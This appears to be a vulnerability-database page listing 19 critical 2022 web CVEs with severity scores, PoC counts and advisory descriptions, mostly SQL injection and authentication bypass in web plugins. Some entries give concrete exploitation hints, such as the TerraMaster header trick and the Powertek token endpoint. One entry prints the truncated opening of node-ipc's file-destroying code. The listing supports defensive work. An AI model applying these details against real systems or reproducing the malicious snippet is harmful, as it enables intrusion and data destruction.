1708 vulnerabilidades · Web Orden: CVSS EPSS Año ID
CVE-2022-47862
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.2%
2022 1 PoC

Lead Management System v1.0 is vulnerable to SQL Injection via the customer_id parameter in ajax_represent.php.

CVE-2022-33175
Software Genérico Web
9.8
CRITICAL
EPSS
0.6%
2022 1 PoC

Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 have an insecure permissions setting on the user.token field that is accessible to everyone through the /cgi/get_param.cgi HTTP API. This leads to disclosing active session ids of currently logged-in administrators. The session id can then be reused to act as the administrator, allowing reading of the cleartext password, or reconfiguring the device.

CVE-2022-4050
JoomSport Web Database Windows ⚡ nuclei
9.8
CRITICAL
EPSS
77.2%
2022 1 PoC

The JoomSport WordPress plugin before 5.2.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

CVE-2022-1768
RSVPMaker Web Database Windows ⚡ nuclei
9.8
CRITICAL
EPSS
86.1%
2022 CWE-89 1 PoC

The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to insufficient escaping and parameterization on user supplied data passed to multiple SQL queries in the ~/rsvpmaker-email.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to, and including, 9.3.2. Please note that this is separate from CVE-2022-1453 & CVE-2022-1505.

CVE-2022-22965
🔥 KEV Spring Framework Web ⚡ nuclei
9.8
CRITICAL
EPSS
94.4%
2022 CWE-94 79 PoCs

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

CVE-2022-3393
Post to CSV by BestWebSoft Web Windows
9.8
CRITICAL
EPSS
2.3%
2022 CWE-1236 1 PoC

The Post to CSV by BestWebSoft WordPress plugin through 1.4.0 does not properly escape fields when exporting data as CSV, leading to a CSV injection

CVE-2022-23812
node-ipc Web
9.8
CRITICAL
EPSS
8.8%
2022 3 PoCs

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return

CVE-2022-43215
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.2%
2022 1 PoC

Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the endDate parameter at getOrderReport.php.

CVE-2022-42245
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.2%
2022 1 PoC

Dreamer CMS 4.0.01 is vulnerable to SQL Injection.

CVE-2022-40032
Software Genérico Web Database ⚡ nuclei
9.8
CRITICAL
EPSS
64.0%
2022 4 PoCs

SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.

CVE-2022-42109
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.8%
2022 1 PoC

Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.

CVE-2022-4118
Bitcoin / AltCoin Payment Gateway for WooCommerce & Multivendor store / shop Web Database Windows
9.8
CRITICAL
EPSS
0.5%
2022 1 PoC

The Bitcoin / AltCoin Payment Gateway for WooCommerce & Multivendor store / shop WordPress plugin through 1.7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users

CVE-2022-4117
IWS Web Database Windows ⚡ nuclei
9.8
CRITICAL
EPSS
62.9%
2022 1 PoC

The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.

CVE-2022-4693
User Verification Web Windows
9.8
CRITICAL
EPSS
10.2%
2022 1 PoC

The User Verification WordPress plugin before 1.0.94 was affected by an Auth Bypass security vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrative role on the website.

CVE-2022-35508
Software Genérico Web
9.8
CRITICAL
EPSS
0.7%
2022 1 PoC

Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) are vulnerable to SSRF when proxying HTTP requests between pve(pmg)proxy and pve(pmg)daemon. An attacker with an unprivileged account can craft an HTTP request to achieve SSRF and file disclosure of any files on the server. Also, in Proxmox Mail Gateway, privilege escalation to the root@pam account is possible if the backup feature has ever been used, because backup files such as pmg-backup_YYYY_MM_DD_*.tgz have 0644 permissions and contain an authkey value. This is fixed in pve-http-server 4.1-3.

CVE-2022-24990
🔥 KEV Software Genérico Web ⚡ nuclei
9.8
CRITICAL
EPSS
94.4%
2022 9 PoCs

TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.

CVE-2022-40943
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.6%
2022 1 PoC

Dairy Farm Shop Management System 1.0 is vulnerable to SQL Injection via bwdate-report-ds.php file.

CVE-2022-0558
microweber/microweber Web
9.8
CRITICAL
EPSS
0.3%
2022 CWE-79 2 PoCs

Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.

CVE-2022-47945
Software Genérico Web ⚡ nuclei
9.8
CRITICAL
EPSS
90.3%
2022 0 PoCs

ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.